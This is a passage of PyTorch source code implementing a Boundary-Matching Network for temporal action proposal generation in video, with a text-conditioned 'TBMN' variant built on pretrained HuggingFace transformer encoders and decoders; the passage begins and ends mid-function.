                kernel_size=(self.num_samples, 1, 1)), nn.ReLU(inplace=True))
        self.x_2d_p = nn.Sequential(
            nn.Conv2d(self.hidden_dim_3d, self.hidden_dim_2d, kernel_size=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(
                self.hidden_dim_2d,
                self.hidden_dim_2d,
                kernel_size=3,
                padding=1), nn.ReLU(inplace=True),
            nn.Conv2d(
                self.hidden_dim_2d,
                self.hidden_dim_2d,
                kernel_size=3,
                padding=1), nn.ReLU(inplace=True),
            nn.Conv2d(self.hidden_dim_2d, 2, kernel_size=1), nn.Sigmoid())
        self.anchors_tmins, self.anchors_tmaxs = self._temporal_anchors(
            -0.5, 1.5)
        self.match_map = self._match_map()
        self.bm_mask = self._get_bm_mask()
    def _match_map(self):
        """Generate match map: (tmin, tmax) pairs for every
        (duration, start) cell, flattened to shape [tscale*tscale, 2]."""
        temporal_gap = 1. / self.tscale
        match_map = []
        for idx in range(self.tscale):
            match_window = []
            tmin = temporal_gap * idx
            for jdx in range(1, self.tscale + 1):
                tmax = tmin + temporal_gap * jdx
                match_window.append([tmin, tmax])
            match_map.append(match_window)
        match_map = np.array(match_map)
        # reorder to (duration, start) major before flattening
        match_map = np.transpose(match_map, [1, 0, 2])
        match_map = np.reshape(match_map, [-1, 2])
        return match_map
    def _temporal_anchors(self, tmin_offset=0., tmax_offset=1.):
        """Generate temporal anchors.

        Args:
            tmin_offset (int): Offset for the minimum value of temporal anchor.
                Default: 0.
            tmax_offset (int): Offset for the maximun value of temporal anchor.
                Default: 1.

        Returns:
            tuple[Sequence[float]]: The minimum and maximum values of temporal
                anchors.
        """
        temporal_gap = 1. / self.tscale
        anchors_tmins = []
        anchors_tmaxs = []
        for i in range(self.tscale):
            anchors_tmins.append(temporal_gap * (i + tmin_offset))
            anchors_tmaxs.append(temporal_gap * (i + tmax_offset))
        return anchors_tmins, anchors_tmaxs
    def _forward(self, x):
        """Define the computation performed at every call.

        Args:
            x (torch.Tensor): The input data.

        Returns:
            torch.Tensor: The output of the module.
        """
        # x.shape [batch_size, self.feat_dim, self.tscale]
        base_feature = self.x_1d_b(x)
        # base_feature.shape [batch_size, self.hidden_dim_1d, self.tscale]
        start = self.x_1d_s(base_feature).squeeze(1)
        # start.shape [batch_size, self.tscale]
        end = self.x_1d_e(base_feature).squeeze(1)
        # end.shape [batch_size, self.tscale]
        confidence_map = self.x_1d_p(base_feature)
        # [batch_size, self.hidden_dim_1d, self.tscale]
        confidence_map = self._boundary_matching_layer(confidence_map)
        # [batch_size, self.hidden_dim_1d, self.num_samples, self.tscale, self.tscale] # noqa
        confidence_map = self.x_3d_p(confidence_map).squeeze(2)
        # [batch_size, self.hidden_dim_3d, self.tscale, self.tscale]
        confidence_map = self.x_2d_p(confidence_map)
        # [batch_size, 2, self.tscale, self.tscale]
        return confidence_map, start, end
    def _boundary_matching_layer(self, x):
        """Generate matching layer: sample each proposal's span via the
        precomputed sample_mask (one matmul, no explicit loops)."""
        input_size = x.size()
        out = torch.matmul(x,
                           self.sample_mask).reshape(input_size[0],
                                                     input_size[1],
                                                     self.num_samples,
                                                     self.tscale, self.tscale)
        return out
    def forward_test(self, raw_feature, video_meta):
        """Define the computation performed at every call when testing."""
        confidence_map, start, end = self._forward(raw_feature)
        start_scores = start[0].cpu().numpy()
        end_scores = end[0].cpu().numpy()
        cls_confidence = (confidence_map[0][1]).cpu().numpy()
        reg_confidence = (confidence_map[0][0]).cpu().numpy()
        max_start = max(start_scores)
        max_end = max(end_scores)
        # generate the set of start points and end points: keep local peaks
        # or any score above half of the global maximum
        start_bins = np.zeros(len(start_scores))
        start_bins[0] = 1  # [1,0,0...,0,0]
        end_bins = np.zeros(len(end_scores))
        end_bins[-1] = 1  # [0,0,0...,0,1]
        for idx in range(1, self.tscale - 1):
            if start_scores[idx] > start_scores[
                    idx + 1] and start_scores[idx] > start_scores[idx - 1]:
                start_bins[idx] = 1
            elif start_scores[idx] > (0.5 * max_start):
                start_bins[idx] = 1
            if end_scores[idx] > end_scores[
                    idx + 1] and end_scores[idx] > end_scores[idx - 1]:
                end_bins[idx] = 1
            elif end_scores[idx] > (0.5 * max_end):
                end_bins[idx] = 1
        # iterate through all combinations of start_index and end_index
        new_proposals = []
        for idx in range(self.tscale):
            for jdx in range(self.tscale):
                start_index = jdx
                end_index = start_index + idx + 1
                if end_index < self.tscale and start_bins[
                        start_index] == 1 and end_bins[end_index] == 1:
                    tmin = start_index / self.tscale
                    tmax = end_index / self.tscale
                    tmin_score = start_scores[start_index]
                    tmax_score = end_scores[end_index]
                    cls_score = cls_confidence[idx, jdx]
                    reg_score = reg_confidence[idx, jdx]
                    # overall proposal score fuses boundary and map scores
                    score = tmin_score * tmax_score * cls_score * reg_score
                    new_proposals.append([
                        tmin, tmax, tmin_score, tmax_score, cls_score,
                        reg_score, score
                    ])
        new_proposals = np.stack(new_proposals)
        video_info = dict(video_meta[0])
        proposal_list = post_processing(new_proposals, video_info,
                                        self.soft_nms_alpha,
                                        self.soft_nms_low_threshold,
                                        self.soft_nms_high_threshold,
                                        self.post_process_top_k,
                                        self.feature_extraction_interval)
        output = [
            dict(
                video_name=video_info['video_name'],
                proposal_list=proposal_list)
        ]
        return output
    def forward_train(self, raw_feature, label_confidence, label_start,
                      label_end):
        """Define the computation performed at every call when training."""
        confidence_map, start, end = self._forward(raw_feature)
        loss = self.loss_cls(confidence_map, start, end, label_confidence,
                             label_start, label_end,
                             self.bm_mask.to(raw_feature.device))
        loss_dict = dict(loss=loss[0])
        return loss_dict
    def generate_labels(self, gt_bbox):
        """Generate training labels (confidence map plus per-anchor
        start/end match scores) from ground-truth segments."""
        match_score_confidence_list = []
        match_score_start_list = []
        match_score_end_list = []
        for every_gt_bbox in gt_bbox:
            gt_iou_map = []
            for start, end in every_gt_bbox:
                if isinstance(start, torch.Tensor):
                    start = start.numpy()
                if isinstance(end, torch.Tensor):
                    end = end.numpy()
                current_gt_iou_map = temporal_iou(self.match_map[:, 0],
                                                  self.match_map[:, 1], start,
                                                  end)
                current_gt_iou_map = np.reshape(current_gt_iou_map,
                                                [self.tscale, self.tscale])
                gt_iou_map.append(current_gt_iou_map)
            # best IoU over all ground-truth segments for each map cell
            gt_iou_map = np.array(gt_iou_map).astype(np.float32)
            gt_iou_map = np.max(gt_iou_map, axis=0)
            gt_tmins = every_gt_bbox[:, 0]
            gt_tmaxs = every_gt_bbox[:, 1]
            # boundary regions: 3 temporal units wide, centred on each boundary
            gt_len_pad = 3 * (1. / self.tscale)
            gt_start_bboxs = np.stack(
                (gt_tmins - gt_len_pad / 2, gt_tmins + gt_len_pad / 2), axis=1)
            gt_end_bboxs = np.stack(
                (gt_tmaxs - gt_len_pad / 2, gt_tmaxs + gt_len_pad / 2), axis=1)
            match_score_start = []
            match_score_end = []
            for anchor_tmin, anchor_tmax in zip(self.anchors_tmins,
                                                self.anchors_tmaxs):
                match_score_start.append(
                    np.max(
                        temporal_iop(anchor_tmin, anchor_tmax,
                                     gt_start_bboxs[:, 0], gt_start_bboxs[:,
                                                                          1])))
                match_score_end.append(
                    np.max(
                        temporal_iop(anchor_tmin, anchor_tmax,
                                     gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
            match_score_confidence_list.append(gt_iou_map)
            match_score_start_list.append(match_score_start)
            match_score_end_list.append(match_score_end)
        match_score_confidence_list = torch.Tensor(match_score_confidence_list)
        match_score_start_list = torch.Tensor(match_score_start_list)
        match_score_end_list = torch.Tensor(match_score_end_list)
        return (match_score_confidence_list, match_score_start_list,
                match_score_end_list)
    def forward(self,
                raw_feature,
                gt_bbox=None,
                video_meta=None,
                return_loss=True):
        """Define the computation performed at every call."""
        if return_loss:
            label_confidence, label_start, label_end = (
                self.generate_labels(gt_bbox))
            device = raw_feature.device
            label_confidence = label_confidence.to(device)
            label_start = label_start.to(device)
            label_end = label_end.to(device)
            return self.forward_train(raw_feature, label_confidence,
                                      label_start, label_end)
        return self.forward_test(raw_feature, video_meta)
    @staticmethod
    def _get_interp1d_bin_mask(seg_tmin, seg_tmax, tscale, num_samples,
                               num_samples_per_bin):
        """Generate sample mask for a boundary-matching pair."""
        plen = float(seg_tmax - seg_tmin)
        plen_sample = plen / (num_samples * num_samples_per_bin - 1.0)
        total_samples = [
            seg_tmin + plen_sample * i
            for i in range(num_samples * num_samples_per_bin)
        ]
        p_mask = []
        for idx in range(num_samples):
            bin_samples = total_samples[idx * num_samples_per_bin:(idx + 1) *
                                        num_samples_per_bin]
            bin_vector = np.zeros(tscale)
            for sample in bin_samples:
                # distribute each fractional sample position linearly over
                # its two neighbouring integer positions
                sample_upper = math.ceil(sample)
                sample_decimal, sample_down = math.modf(sample)
                if 0 <= int(sample_down) <= (tscale - 1):
                    bin_vector[int(sample_down)] += 1 - sample_decimal
                if 0 <= int(sample_upper) <= (tscale - 1):
                    bin_vector[int(sample_upper)] += sample_decimal
            bin_vector = 1.0 / num_samples_per_bin * bin_vector
            p_mask.append(bin_vector)
        p_mask = np.stack(p_mask, axis=1)
        return p_mask
    def _get_interp1d_mask(self):
        """Generate sample mask for each point in Boundary-Matching Map."""
        mask_mat = []
        for start_index in range(self.tscale):
            mask_mat_vector = []
            for duration_index in range(self.tscale):
                if start_index + duration_index < self.tscale:
                    p_tmin = start_index
                    p_tmax = start_index + duration_index
                    # extend the sampled span beyond the proposal by
                    # boundary_ratio on each side
                    center_len = float(p_tmax - p_tmin) + 1
                    sample_tmin = p_tmin - (center_len * self.boundary_ratio)
                    sample_tmax = p_tmax + (center_len * self.boundary_ratio)
                    p_mask = self._get_interp1d_bin_mask(
                        sample_tmin, sample_tmax, self.tscale,
                        self.num_samples, self.num_samples_per_bin)
                else:
                    # invalid cell (proposal would run past the sequence end)
                    p_mask = np.zeros([self.tscale, self.num_samples])
                mask_mat_vector.append(p_mask)
            mask_mat_vector = np.stack(mask_mat_vector, axis=2)
            mask_mat.append(mask_mat_vector)
        mask_mat = np.stack(mask_mat, axis=3)
        mask_mat = mask_mat.astype(np.float32)
        # stored as a frozen parameter so it moves with the module's device
        self.sample_mask = nn.Parameter(
            torch.tensor(mask_mat).view(self.tscale, -1), requires_grad=False)
    def _get_bm_mask(self):
        """Generate Boundary-Matching Mask (upper-triangular validity mask)."""
        bm_mask = []
        for idx in range(self.tscale):
            mask_vector = [1] * (self.tscale - idx) + [0] * idx
            bm_mask.append(mask_vector)
        bm_mask = torch.tensor(bm_mask, dtype=torch.float)
        return bm_mask
class TransformerEncoder(nn.Module):
    """Pretrained HuggingFace transformer encoder fed with precomputed
    embeddings instead of token ids.

    Args:
        pretrained_transformers (str): name/path for ``AutoModel``.
        freeze (bool): freeze the encoder parameters. Default: False.
        layers (int): number of encoder layers to keep. Default: 6.
        final_channel_number (int): hidden size of the output LayerNorm.
            Default: 768.
    """
    def __init__(self, pretrained_transformers, freeze=False, layers=6, final_channel_number=768):
        super().__init__()
        self.model = AutoModel.from_pretrained(pretrained_transformers)
        # truncate to the first `layers` encoder layers
        self.model.encoder.layer = self.model.encoder.layer[:layers]
        # word embeddings are unused: inputs already arrive as embeddings
        self.model.embeddings.word_embeddings = None
        self.embeddings = self.model.embeddings
        self.model = self.model.encoder
        self.norm = nn.LayerNorm(final_channel_number)
        if freeze:
            self.model.eval()
            for p in self.model.parameters():
                # freeze all pretrained parameters; trainable layers are added downstream
                p.requires_grad = False
    def forward(self,
                embedding_input,
                attention_mask=None,
                head_mask=None,
                encoder_hidden_states=None,
                encoder_attention_mask=None,
                past_key_values=None,
                use_cache=None,
                output_attentions=None,
                output_hidden_states=None,
                return_dict=True,
                ):
        """Run the encoder; ``embedding_input`` is a tensor of embeddings.

        Returns the LayerNorm-ed last hidden state.
        """
        # add position (and token-type) embeddings to the raw input embeddings
        embedding_input_with_position = self.embeddings(inputs_embeds=embedding_input)
        output = self.model(
            embedding_input_with_position,
            attention_mask=attention_mask,
            head_mask=head_mask,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            past_key_values=past_key_values,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        embedding_output = output[0]
        embedding_output = self.norm(embedding_output)
        return embedding_output
class TransformerDecoder(nn.Module):
    """Cross-attention transformer decoder built from a pretrained encoder
    checkpoint (self-attention weights are copied into cross-attention).

    Args:
        pretrained_transformers (str): name/path for ``AutoConfig`` and the
            checkpoint loaded in :meth:`init_weight`.
        freeze (bool): freeze the decoder parameters. Default: False.
        layers (int): number of layers to keep. Default: 6.
        final_channel_number (int): hidden size of the output LayerNorm.
            Default: 768.
        replace_dict (list): [old, new] prefix pairs applied to checkpoint
            keys. NOTE(review): mutable default argument — harmless here
            since it is never mutated, but worth cleaning up.
    """
    def __init__(self, pretrained_transformers, freeze=False, layers=6, final_channel_number=768, replace_dict=[['roberta.', '']]):
        super().__init__()
        self.config = AutoConfig.from_pretrained(pretrained_transformers)
        # enable decoder mode with cross-attention blocks
        self.config.is_decoder=True
        self.config.add_cross_attention=True
        self.model = AutoModel.from_config(self.config)
        self.init_weight(pretrained_transformers, replace_dict)
        if freeze:
            self.model.eval()
            for p in self.model.parameters():
                # freeze all pretrained parameters; trainable layers are added downstream
                p.requires_grad = False
        self.model.encoder.layer = self.model.encoder.layer[:layers]
        # word embeddings are unused: inputs already arrive as embeddings
        self.model.embeddings.word_embeddings = None
        # separate position-embedding modules for queries and keys/values
        self.embeddings_q = self.model.embeddings
        self.embeddings_kv = copy.deepcopy(self.embeddings_q)
        self.model = self.model.encoder
        self.norm = nn.LayerNorm(final_channel_number)
    def init_weight(self, pretrained_transformers, replace_dict=[]):
        """Load checkpoint weights, renaming keys per ``replace_dict`` and
        duplicating each ``.attention.`` weight into ``.crossattention.``
        so the new cross-attention blocks start from pretrained weights."""
        state_dict = torch.load(os.path.join(pretrained_transformers, 'pytorch_model.bin'), map_location='cpu')
        new_state_dict = OrderedDict()
        for k, v in state_dict.items():
            new_k = k
            for raw_str, replace_str in replace_dict:
                new_k = new_k.replace(raw_str, replace_str)
            new_state_dict[new_k] = v
            if '.attention.' in new_k:
                new_k = new_k.replace('.attention.', '.crossattention.')
                new_state_dict[new_k] = v
        # strict=False: unmatched keys (e.g. embeddings/pooler) are ignored
        self.model.load_state_dict(new_state_dict, strict=False)
    def forward(self,
                embedding_input,
                attention_mask=None,
                head_mask=None,
                encoder_hidden_states=None,
                encoder_attention_mask=None,
                past_key_values=None,
                use_cache=None,
                output_attentions=None,
                output_hidden_states=None,
                return_dict=True,
                emb_q=False,
                emb_kv=False,
                ):
        """Cross-attend ``embedding_input`` (queries) over
        ``encoder_hidden_states`` (keys/values).

        ``emb_q`` / ``emb_kv`` control whether position embeddings are
        added to the respective inputs first.
        """
        if emb_q:
            embedding_input_with_position = self.embeddings_q(inputs_embeds=embedding_input)
        else:
            embedding_input_with_position = embedding_input
        if emb_kv:
            encoder_hidden_states_with_position = self.embeddings_kv(inputs_embeds=encoder_hidden_states)
        else:
            encoder_hidden_states_with_position = encoder_hidden_states
        output = self.model(
            embedding_input_with_position,
            attention_mask=attention_mask,
            head_mask=head_mask,
            encoder_hidden_states=encoder_hidden_states_with_position,
            encoder_attention_mask=encoder_attention_mask,
            past_key_values=past_key_values,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            # NOTE(review): `extra_layer` is not a standard transformers
            # encoder kwarg — this appears to require a patched/forked
            # transformers library; confirm the installed version.
            extra_layer=self.embeddings_q,
        )
        embedding_output = output[0]
        # re-apply the query embedding module to the decoder output
        embedding_output = self.embeddings_q(inputs_embeds=embedding_output)
        embedding_output = self.norm(embedding_output)
        return embedding_output
class NLPModel(nn.Module):
    """Text encoder: pretrained HuggingFace model plus mean pooling.

    Args:
        pretrained_nlp (str): name/path for AutoModel/AutoTokenizer/AutoConfig.
        layers (int): number of encoder layers to keep. Default: 6.
        final_channel_number (int): hidden size of the output LayerNorm.
            Default: 768.
        max_length (int): tokenizer truncation length. Default: 64.
        freeze (bool): freeze the language-model parameters. Default: False.
    """
    def __init__(self, pretrained_nlp, layers=6, final_channel_number=768, max_length=64, freeze=False):
        super().__init__()
        self.nlp_model = AutoModel.from_pretrained(pretrained_nlp)
        self.tokenizer = AutoTokenizer.from_pretrained(pretrained_nlp)
        self.config = AutoConfig.from_pretrained(pretrained_nlp)
        self.max_length = max_length
        self.norm = nn.LayerNorm(final_channel_number)
        # truncate to the first `layers` encoder layers
        self.nlp_model.encoder.layer = self.nlp_model.encoder.layer[:layers]
        if freeze:
            self.nlp_model.eval()
            for p in self.nlp_model.parameters():
                # freeze all pretrained parameters; trainable layers are added downstream
                p.requires_grad = False
    def mean_pooling(self, model_output, attention_mask):
        """Masked mean over the token axis; 1e-9 avoids divide-by-zero."""
        # model_output.shape = [bs, N, 768]
        # attention_mask.shape = [bs, N]
        embedding = model_output[0]
        x = torch.sum(embedding * attention_mask[..., None], 1, keepdim=True) / (torch.sum(attention_mask[..., None], 1, keepdim=True)+1e-9)
        return x
    def forward(self, text, device):
        """Encode ``text`` and return (per-token features, attention mask,
        normalised mean-pooled global feature)."""
        encoded_input = self.tokenizer(text, padding=True, truncation=True, return_tensors='pt', max_length=self.max_length)
        for key in encoded_input.keys():
            encoded_input[key] = encoded_input[key].to(device)
        model_output = self.nlp_model(**encoded_input)
        output_global_feature = self.mean_pooling(model_output, encoded_input['attention_mask'])
        output_global_feature = self.norm(output_global_feature)
        output_feature = model_output[0]
        input_mask = encoded_input['attention_mask']
        return output_feature, input_mask, output_global_feature
@LOCALIZERS.register_module()
class TBMN(BaseLocalizer):
    """Boundary Matching Network for temporal action proposal generation.

    Please refer `BMN: Boundary-Matching Network for Temporal Action Proposal
    Generation <https://arxiv.org/abs/1907.09702>`_.
    Code Reference https://github.com/JJBOY/BMN-Boundary-Matching-Network

    This "TBMN" variant additionally builds a language encoder and a
    cross-modal transformer decoder so that, at test time, proposals are
    generated once per unique query text (see ``forward_test``). Note that
    all three cross-modal fusion variants inside ``_forward`` are currently
    commented out, so the active forward path is plain BMN.

    Args:
        temporal_dim (int): Total frames selected for each video.
        boundary_ratio (float): Ratio for determining video boundaries.
        num_samples (int): Number of samples for each proposal.
        num_samples_per_bin (int): Number of bin samples for each sample.
        feat_dim (int): Feature dimension.
        soft_nms_alpha (float): Soft NMS alpha.
        soft_nms_low_threshold (float): Soft NMS low threshold.
        soft_nms_high_threshold (float): Soft NMS high threshold.
        post_process_top_k (int): Top k proposals in post process.
        vision_encoder (dict | None): Accepted but currently unused.
            Default: None.
        language_encoder (dict | None): Config dict; only its
            ``pretrained_language_encoder`` entry is read to build
            :class:`NLPModel`. Default: None.
        cross_feature_decoder (dict | None): Config dict used to build
            :class:`TransformerDecoder`. Default: None.
        feature_extraction_interval (int):
            Interval used in feature extraction. Default: 16.
        loss_cls (dict): Config for building loss.
            Default: ``dict(type='BMNLoss')``.
        hidden_dim_1d (int): Hidden dim for 1d conv. Default: 256.
        hidden_dim_2d (int): Hidden dim for 2d conv. Default: 128.
        hidden_dim_3d (int): Hidden dim for 3d conv. Default: 512.
    """

    def __init__(self,
                 temporal_dim,
                 boundary_ratio,
                 num_samples,
                 num_samples_per_bin,
                 feat_dim,
                 soft_nms_alpha,
                 soft_nms_low_threshold,
                 soft_nms_high_threshold,
                 post_process_top_k,
                 vision_encoder=None,
                 language_encoder=None,
                 cross_feature_decoder=None,
                 feature_extraction_interval=16,
                 loss_cls=dict(type='BMNLoss'),
                 hidden_dim_1d=256,
                 hidden_dim_2d=128,
                 hidden_dim_3d=512,
                 ):
        # NOTE(review): this calls the *grandparent* constructor, skipping
        # BaseLocalizer.__init__ — presumably to avoid its backbone/head
        # setup. Confirm this is intentional.
        super(BaseLocalizer, self).__init__()
        self.tscale = temporal_dim
        self.boundary_ratio = boundary_ratio
        self.num_samples = num_samples
        self.num_samples_per_bin = num_samples_per_bin
        self.feat_dim = feat_dim
        self.soft_nms_alpha = soft_nms_alpha
        self.soft_nms_low_threshold = soft_nms_low_threshold
        self.soft_nms_high_threshold = soft_nms_high_threshold
        self.post_process_top_k = post_process_top_k
        self.feature_extraction_interval = feature_extraction_interval
        self.loss_cls = build_loss(loss_cls)
        self.hidden_dim_1d = hidden_dim_1d
        self.hidden_dim_2d = hidden_dim_2d
        self.hidden_dim_3d = hidden_dim_3d
        # Language branch: pretrained NLP encoder for the query text.
        # NOTE(review): `vision_encoder` is accepted but never used here.
        self.language_encoder = NLPModel(
            pretrained_nlp=language_encoder['pretrained_language_encoder'],
        )
        # Projects 400-d video features into the 768-d text embedding space
        # (used only by the commented-out fusion variants in `_forward`).
        self.convert_input_feature_dim = nn.Sequential(
            nn.Linear(400, 768),
            nn.LayerNorm(768),
        )
        self.cross_feature_decoder = TransformerDecoder(
            pretrained_transformers=cross_feature_decoder['pretrained_cross_feature_decoder'],
            freeze=cross_feature_decoder['freeze'],
            layers=cross_feature_decoder['layers'],
            final_channel_number=cross_feature_decoder['final_channel_number'],
            replace_dict=cross_feature_decoder['replace_dict'],
        )
        # Disabled alternative: a cross-modal *encoder* instead of a decoder.
        # self.cross_feature_encoder = TransformerEncoder(
        #     pretrained_transformers=cross_feature_decoder['pretrained_cross_feature_decoder'],
        #     freeze=cross_feature_decoder['freeze'],
        #     layers=cross_feature_decoder['layers'],
        #     final_channel_number=cross_feature_decoder['final_channel_number'],
        #     # replace_dict=cross_feature_decoder['replace_dict'],
        # )
        # Projects 768-d fused features back to the 400-d video space.
        self.convert_output_feature_dim = nn.Sequential(
            nn.Linear(768, 400),
            nn.LayerNorm(400),
        )
        # Extra start/end heads over raw 400-d features; only referenced by
        # the commented-out "position-only decoder" variant in `_forward`.
        self.x_s = nn.Sequential(nn.Conv1d(400, 400, kernel_size=3, padding=1, groups=4), nn.ReLU(inplace=True), nn.Conv1d(400, 1, kernel_size=1,), nn.Sigmoid())
        self.x_e = nn.Sequential(nn.Conv1d(400, 400, kernel_size=3, padding=1, groups=4), nn.ReLU(inplace=True), nn.Conv1d(400, 1, kernel_size=1,), nn.Sigmoid())
        self._get_interp1d_mask()
        # Base Module
        self.x_1d_b = nn.Sequential(
            nn.Conv1d(
                self.feat_dim,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True),
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True))
        # Temporal Evaluation Module
        self.x_1d_s = nn.Sequential(
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True),
            nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
        self.x_1d_e = nn.Sequential(
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1,
                groups=4), nn.ReLU(inplace=True),
            nn.Conv1d(self.hidden_dim_1d, 1, kernel_size=1), nn.Sigmoid())
        # Proposal Evaluation Module
        self.x_1d_p = nn.Sequential(
            nn.Conv1d(
                self.hidden_dim_1d,
                self.hidden_dim_1d,
                kernel_size=3,
                padding=1), nn.ReLU(inplace=True))
        self.x_3d_p = nn.Sequential(
            nn.Conv3d(
                self.hidden_dim_1d,
                self.hidden_dim_3d,
                kernel_size=(self.num_samples, 1, 1)), nn.ReLU(inplace=True))
        self.x_2d_p = nn.Sequential(
            nn.Conv2d(self.hidden_dim_3d, self.hidden_dim_2d, kernel_size=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(
                self.hidden_dim_2d,
                self.hidden_dim_2d,
                kernel_size=3,
                padding=1), nn.ReLU(inplace=True),
            nn.Conv2d(
                self.hidden_dim_2d,
                self.hidden_dim_2d,
                kernel_size=3,
                padding=1), nn.ReLU(inplace=True),
            nn.Conv2d(self.hidden_dim_2d, 2, kernel_size=1), nn.Sigmoid())
        # Anchors widened by half a temporal bin on each side (-0.5, 1.5).
        self.anchors_tmins, self.anchors_tmaxs = self._temporal_anchors(-0.5, 1.5)
        self.match_map = self._match_map()
        self.bm_mask = self._get_bm_mask()

    def _match_map(self):
        """Generate match map: (tmin, tmax) for every (duration, start) pair,
        flattened to shape ``[tscale * tscale, 2]`` in duration-major order."""
        temporal_gap = 1. / self.tscale
        match_map = []
        for idx in range(self.tscale):
            match_window = []
            tmin = temporal_gap * idx
            for jdx in range(1, self.tscale + 1):
                tmax = tmin + temporal_gap * jdx
                match_window.append([tmin, tmax])
            match_map.append(match_window)
        match_map = np.array(match_map)
        # Transpose so axis 0 is proposal duration, axis 1 is start index.
        match_map = np.transpose(match_map, [1, 0, 2])
        match_map = np.reshape(match_map, [-1, 2])
        return match_map

    def _temporal_anchors(self, tmin_offset=0., tmax_offset=1.):
        """Generate temporal anchors.

        Args:
            tmin_offset (int): Offset for the minimum value of temporal anchor.
                Default: 0.
            tmax_offset (int): Offset for the maximun value of temporal anchor.
                Default: 1.
        Returns:
            tuple[Sequence[float]]: The minimum and maximum values of temporal
                anchors.
        """
        temporal_gap = 1. / self.tscale
        anchors_tmins = []
        anchors_tmaxs = []
        for i in range(self.tscale):
            anchors_tmins.append(temporal_gap * (i + tmin_offset))
            anchors_tmaxs.append(temporal_gap * (i + tmax_offset))
        return anchors_tmins, anchors_tmaxs

    def _forward(self, x, video_meta, text=None):
        """Define the computation performed at every call.

        Args:
            x (torch.Tensor): The input data.
        Returns:
            torch.Tensor: The output of the module.
        """
        # x.shape [batch_size, self.feat_dim, self.tscale]
        if text is not None:
            text = [text]
        else:
            text = [vm['text'] for vm in video_meta]
        # NOTE(review): `text` is prepared but unused below — all three
        # cross-modal fusion variants are currently disabled.
        # Variant 1 (disabled): position-only decoder.
        # x_tran = x.permute(0, 2, 1) # [bs, c, t] -> [bs, t, c]
        # x_tran = self.convert_input_feature_dim(x_tran)
        # position_feature = torch.zeros_like(x_tran)
        # x_tran = self.cross_feature_decoder(position_feature, encoder_hidden_states=x_tran, emb_q=False, emb_kv=True)
        # x_tran = self.convert_output_feature_dim(x_tran)
        # x_tran = x_tran.permute(0, 2, 1) # [bs, t, c] -> [bs, c, t]
        # start = self.x_s(x_tran).squeeze(1)
        # end = self.x_e(x_tran).squeeze(1)
        # Variant 2 (disabled): decoder mode, global text feature as query.
        # text_feature, attention_mask, text_global_feature = self.language_encoder(text, x.device)
        # query_text_global_feature = torch.repeat_interleave(text_global_feature, self.tscale, 1)
        # res_x = x
        # x = x.permute(0, 2, 1)
        # x = self.convert_input_feature_dim(x)
        # x = self.cross_feature_decoder(query_text_global_feature, encoder_hidden_states=x, emb_q=False, emb_kv=True)
        # x = self.convert_output_feature_dim(x)
        # x = x.permute(0, 2, 1)
        # Variant 3 (disabled): encoder mode over concatenated modalities.
        # text_feature, text_mask, _ = self.language_encoder(text, x.device)
        # vision_feature = x.permute(0, 2, 1)
        # vision_feature = self.convert_input_feature_dim(vision_feature)
        # vision_mask = torch.ones_like(vision_feature)[..., 0]
        # mix_feature = torch.cat([vision_feature, text_feature], dim=1)
        # mix_mask = torch.cat([vision_mask, text_mask], dim=1).float()
        # mix_mask = (1 - mix_mask[:, None, None, :]) * -10000
        # mix_feature = self.cross_feature_encoder(mix_feature, attention_mask=mix_mask)
        # mix_feature = self.convert_output_feature_dim(mix_feature)
        # mix_feature = mix_feature[:, :self.tscale]
        # x = mix_feature.permute(0, 2, 1)
        base_feature = self.x_1d_b(x)
        # base_feature.shape [batch_size, self.hidden_dim_1d, self.tscale]
        start = self.x_1d_s(base_feature).squeeze(1)
        # start.shape [batch_size, self.tscale]
        end = self.x_1d_e(base_feature).squeeze(1)
        # end.shape [batch_size, self.tscale]
        confidence_map = self.x_1d_p(base_feature)
        # [batch_size, self.hidden_dim_1d, self.tscale]
        confidence_map = self._boundary_matching_layer(confidence_map)
        # [batch_size, self.hidden_dim_1d, self.num_samples, self.tscale, self.tscale] # noqa
        confidence_map = self.x_3d_p(confidence_map).squeeze(2)
        # [batch_size, self.hidden_dim_3d, self.tscale, self.tscale]
        confidence_map = self.x_2d_p(confidence_map)
        # [batch_size, 2, self.tscale, self.tscale]
        return confidence_map, start, end

    def _boundary_matching_layer(self, x):
        """Generate matching layer: sample each proposal's interior via the
        precomputed interpolation mask (see ``_get_interp1d_mask``)."""
        input_size = x.size()
        out = torch.matmul(x,
                           self.sample_mask).reshape(input_size[0],
                                                     input_size[1],
                                                     self.num_samples,
                                                     self.tscale, self.tscale)
        return out

    def forward_test(self, raw_feature, video_meta):
        """Define the computation performed at every call when testing."""
        '''
        proposal_list list[dict]: The updated proposals, e.g.
            [{'score': 0.9, 'segment': [0, 1]},
             {'score': 0.8, 'segment': [0, 2]},
             ...].
        output = [
            dict(
                video_name=video_info['video_name'],
                proposal_list=proposal_list)
        ]
        '''
        # NOTE(review): only video_meta[0] is read — this path assumes a
        # batch size of 1 at test time; confirm against the test pipeline.
        # all_text = np.array([vm['text'] for vm in video_meta])
        all_text = np.array(video_meta[0]['text'])
        all_text = np.unique(all_text)
        proposal_list = []
        # Run the full proposal pipeline once per unique query text.
        for text in all_text:
            confidence_map, start, end = self._forward(raw_feature, video_meta, text=text)
            start_scores = start[0].cpu().numpy()
            end_scores = end[0].cpu().numpy()
            cls_confidence = (confidence_map[0][1]).cpu().numpy()
            reg_confidence = (confidence_map[0][0]).cpu().numpy()
            max_start = max(start_scores)
            max_end = max(end_scores)
            # generate the set of start points and end points:
            # a position qualifies if it is a local maximum or exceeds
            # half of the global maximum score.
            start_bins = np.zeros(len(start_scores))
            start_bins[0] = 1  # [1,0,0...,0,0]
            end_bins = np.zeros(len(end_scores))
